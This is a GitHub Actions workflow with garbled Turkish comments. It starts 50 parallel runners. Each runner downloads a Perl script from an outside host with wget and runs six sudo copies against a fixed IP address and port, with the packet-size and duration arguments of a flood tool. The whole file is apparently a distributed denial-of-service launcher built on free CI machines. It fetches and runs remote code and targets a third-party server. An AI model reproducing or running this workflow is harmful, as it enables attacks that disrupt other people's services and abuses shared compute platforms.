name: TekPoyraz - VAHÅžÄ° OPTÄ°MÄ°ZASYON ðŸ”¥

on:
  workflow_dispatch:

jobs:
  vds:
    runs-on: ubuntu-latest
    strategy:
      # Paralel Ã§alÄ±ÅŸacak makine sayÄ±sÄ±nÄ±, hÄ±zlÄ± baÅŸlatma limitini aÅŸmayacak ÅŸekilde 50'ye dÃ¼ÅŸÃ¼rdÃ¼k.
      max-parallel: 50
      matrix:
        # Sadece 50 iÅŸ baÅŸlat. Kuyrukta beklemeye son!
        instance: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50]

    steps:
      - name: Ä°ndir ve HazÄ±rla
        run: |
          wget https://wgetz.com/Rv6818n0XE/cacasexdc2.pl -O cacasexdc2.pl
          chmod +x cacasexdc2.pl
          
      - name: ðŸ”¥ TEK MAKÄ°NEDEN 8 Ã‡EKÄ°RDEK GÃœCÃœ AL
        run: |
          PIDS=()
          # HER MAKÄ°NE Ä°Ã‡Ä°NDE 8 PARALEL Ä°ÅžLEM BAÅžLAT!
          for i in {1..6}; do
            sudo timeout 20 perl cacasexdc2.pl 146.103.26.136 22126 1024 20 &
            PIDS+=($!)
          done
          
          # Hepsini bekle ve bitir.
          for pid in "${PIDS[@]}"; do
            wait $pid
          done

      - name: KapanÄ±ÅŸ
        run: |
          sleep 20
          exit 0
